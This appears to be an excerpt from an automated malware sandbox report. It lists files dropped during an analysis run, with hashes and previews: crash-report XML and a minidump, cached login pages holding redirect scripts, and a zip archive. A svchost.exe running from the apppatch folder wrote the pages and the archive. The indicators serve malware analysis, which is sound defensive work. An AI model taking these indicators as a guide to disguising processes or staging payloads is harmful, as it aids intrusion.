                                                                                                                                                                                                          SHA-512:8E0F6CD5E69D9BC1B6B448A66A647E89464F614E293A5648E3795C7AC6C8CD29DC12A5BFF5EC3669F94EECCEEC759FCCEC4FB5AD0B5B46C19D199D20009D864B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.6.4.<./.P.i.

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB87.tmp.xml

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4634
                                                                                                                                                                                                          Entropy (8bit):4.513823304893427
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsgJg77aI98AAXWpW8VYdvYm8M4JCKgwFbt+q8dgPUSHvlvVd:uIjfmI72AAm7VCyJCKdSUUevlvVd
                                                                                                                                                                                                          MD5:B3032C8BC9D756841397B317D822623B
                                                                                                                                                                                                          SHA1:C95CC45713F9DB98885105FF5C872F52B259401F
                                                                                                                                                                                                          SHA-256:507E2E0C2B88B773C783236C66D51E120F86239238760F30E2F7B958C3633BDD
                                                                                                                                                                                                          SHA-512:F7F2D9A80868367B228C027003BB825E6964C2A17FB1B23F41796289DBC392A130EC1E172C9BC3222841F58074756258FA16A831FE438840F28DF9B00D0C4AFE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583707" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBC3.tmp.dmp

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:24:42 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):71508
                                                                                                                                                                                                          Entropy (8bit):1.8864298261074235
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:k5mBezMeOa/f5gH9Rhu/4iZQTGkf47ML:FEoeOaZKRhu/4W7M
                                                                                                                                                                                                          MD5:60762F8F38B599E0C86619509CAF16F7
                                                                                                                                                                                                          SHA1:B70B98BB85A124D3B01F45C638FE0233F1B01725
                                                                                                                                                                                                          SHA-256:E5670DF893E7578ECC5C7273615081E883637A7E46A5DE6425A6D1B97FEBA44D
                                                                                                                                                                                                          SHA-512:B2B2CCA25A3A9AB6E291E2D172A8AF91E1F99CD74E8231448E00082F1EB910A9AD9470E35388D172F7485A53B50327302FBAD46DE13746A3D4425832A2518832
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MDMP..a..... ........=2g............$...............,............5..........T.......8...........T...........8...........................................................................................................eJ......D.......GenuineIntel............T............=2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD3B.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8366
                                                                                                                                                                                                          Entropy (8bit):3.703294762778584
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJB26DT6e6YS6SU97aZc++Fgmfmgpra89bIdsfVcYm:R6lXJA6D6YfSU9BBFgmfmGIWfVC
                                                                                                                                                                                                          MD5:58F5C76A30A4035E49C496474B3BF815
                                                                                                                                                                                                          SHA1:32397C8618CC0C45BD814681D418F35EC735BD8E
                                                                                                                                                                                                          SHA-256:9FFFD43A8CAECC98C0B855CBB41A4500C4F3D1F392362A6E7CAA6DB110B2EEE1
                                                                                                                                                                                                          SHA-512:18B03DB2429BD7B7C2E3899177AB7AD5F6DADD686867D74B119D3C2772C4916427E130716E9102A38518BA78B82F531D1CE55171693375D67ED61DE55D8F047A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.3.2.<./.P.i.

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERFDC9.tmp.xml

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4634
                                                                                                                                                                                                          Entropy (8bit):4.512457049787961
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsgJg77aI98AAXWpW8VY5Ym8M4JCKgwFx/dc+q8dglSHvlvkd:uIjfmI72AAm7VlJCK9VcScevlvkd
                                                                                                                                                                                                          MD5:C97D871C610CA6A237BFE60F04DD8589
                                                                                                                                                                                                          SHA1:D4B8E6FA6C3969C0E3A068D843366396B6086C7E
                                                                                                                                                                                                          SHA-256:7FF601BFA546BA8C0985A5C28E61387D432DF264551400E8208009DE825F3586
                                                                                                                                                                                                          SHA-512:4D923B7A567C741EAE0D5E1C09CF4D5A4B66AFBB381F9360B85FE9F4671071B5EC987E19978250C874E4D28604306EF666F96826C87E0C5D3FC576C3F193062E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583707" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\login[1].htm

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):173
                                                                                                                                                                                                          Entropy (8bit):4.43096450882803
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                          MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                          SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                          SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                          SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\login[2].htm

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114
                                                                                                                                                                                                          Entropy (8bit):4.802925647778009
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                          MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                          SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                          SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                          SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\login[4].htm

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):173
                                                                                                                                                                                                          Entropy (8bit):4.43096450882803
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                          MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                          SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                          SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                          SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\login[2].htm

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114
                                                                                                                                                                                                          Entropy (8bit):4.802925647778009
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                          MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                          SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                          SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                          SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\login[3].htm

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114
                                                                                                                                                                                                          Entropy (8bit):4.802925647778009
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                          MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                          SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                          SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                          SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\login[4].htm

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):593
                                                                                                                                                                                                          Entropy (8bit):4.470551863591405
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                          MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                          SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                          SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                          SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\login[1].htm

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (10731), with CRLF, LF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):43413
                                                                                                                                                                                                          Entropy (8bit):6.060996620549828
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:CiBtrifZVO7Wg3hIBY6yXY7JXOmuzrVuzQuzuuz2uzxUJ0GyIdiGPtYbcq:C8Cg3RkFONr0+ZPtYbcq
                                                                                                                                                                                                          MD5:FEAAF33F2A7D4FCF9F3DC477FA12DCBC
                                                                                                                                                                                                          SHA1:FEC1E98ABEF4485471B066AA7D21C46AD4AB236E
                                                                                                                                                                                                          SHA-256:E15D6F44762E9DF7916974B85015266DCF1D29E806AF357967A9C12861595DCA
                                                                                                                                                                                                          SHA-512:95463A01038895942B6CBD4BB529BA6E362ACCBE3D14BAF19AD3055BCB7A9275FED3002B15CBC8EB5F7112A6360BCF1E187EC0772316734ADB03B81C9DE5459E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<html>..<head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">.. <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT","RO","BG","ET","EL","GA","HR","LV","LT","MT","NL","PL","SV","SK","SL","CS","HU","RU","SR

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\login[2].htm

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114
                                                                                                                                                                                                          Entropy (8bit):4.802925647778009
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                          MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                          SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                          SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                          SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\login[3].htm

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):593
                                                                                                                                                                                                          Entropy (8bit):4.470551863591405
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                          MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                          SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                          SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                          SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\login[4].htm

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):162
                                                                                                                                                                                                          Entropy (8bit):4.43530643106624
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
                                                                                                                                                                                                          MD5:4F8E702CC244EC5D4DE32740C0ECBD97
                                                                                                                                                                                                          SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
                                                                                                                                                                                                          SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
                                                                                                                                                                                                          SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\login[5].htm

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):173
                                                                                                                                                                                                          Entropy (8bit):4.43096450882803
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                          MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                          SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                          SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                          SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\5446515.zip

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):52175
                                                                                                                                                                                                          Entropy (8bit):7.845224460713523
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:ROUR/+wXalJ+/OBjlsabpQMNflCcV0cZnb5M5ZXXnM5eH9E:RgYoIm3swQwd0c5e5gedE
                                                                                                                                                                                                          MD5:01A727F95414E3982650866DE770EF1C
                                                                                                                                                                                                          SHA1:501057B6892123B85F4C473DE9B7703B62E54F4E
                                                                                                                                                                                                          SHA-256:217F15D121FB419C94AA05C597FD76F3C28972AE34796B8A41540DAD9DED1D2B
                                                                                                                                                                                                          SHA-512:78B9CF316F828EA18BD83A1763390679A9DDE2AB7CB0852BA1E9250784DB56071D5E2B281968FD0C88C6BB8467E135C8A9C47BD2BF2070F3064A3DDD65FFC872
                                                                                                                                                                                                          Malicious:false
